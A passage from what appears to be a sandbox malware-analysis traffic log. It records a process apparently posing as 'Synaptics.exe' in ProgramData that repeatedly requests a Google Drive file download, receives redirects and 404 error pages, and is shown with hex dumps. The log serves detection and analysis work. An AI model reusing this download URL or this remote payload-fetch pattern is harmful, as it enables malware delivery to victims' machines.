                                                                                                                                                                    2024-12-30 03:59:09 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.449750142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z0uhgEb3L28JVztdGCjl7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.449752142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:10 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-30 03:59:11 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4KKxO_7hnrUA66jaVCwf6cCnVUhMMQNckVcM4eFLsoq5H9r_A_U427ivZsFvXySlDQ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wtj14MjPh4z9YXZaEgYoNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04; expires=Tue, 01-Jul-2025 03:59:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:11 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 56 62 4f 6d 53 70 52 38 4d 76 56 2d 79 77 78 4c 65 73 64 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NVbOmSpR8MvV-ywxLesdYg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                    2024-12-30 03:59:11 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.449753142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:11 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6RS07ST1kpU9kdRSvtDKk6c4oeW0W-6gvf9wushLh9ElqzmmZdWtjNyRS1YWlQZd1r
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:11 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z2trGexnkfgVwHUKatiSEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:11 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:11 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 39 2d 57 4d 74 79 5f 38 69 49 6f 67 6a 6d 4e 7a 7a 43 53 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="_9-WMty_8iIogjmNzzCS-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.449754142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-urlSNW76vfCIoLcSJEcCJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.449756142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:11 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TZm_q0-sf804UGJoQ_4xFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.449760142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5LtEz12ZHfeFdJ9-yQqYUnnwrOh5Y0vGEnBiTZhJGzPiovz0WHMkvHMpL--7_-CRd1L0riA1A
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dgYqnm3Mz9zkdy_Ewq9Dew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 67 51 49 78 46 6b 68 34 55 42 34 78 78 72 68 66 36 31 54 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="AgQIxFkh4UB4xxrhf61TdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.449759142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hi0Re6hgfk57Lfs9RLvlcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.449763142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5TuCNmwWNgnO3Ttu6oyTnaLImnhSPrgxrURcHsDufdP4HkuKzkulSciAu0N-IOCIDeKCehem0
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
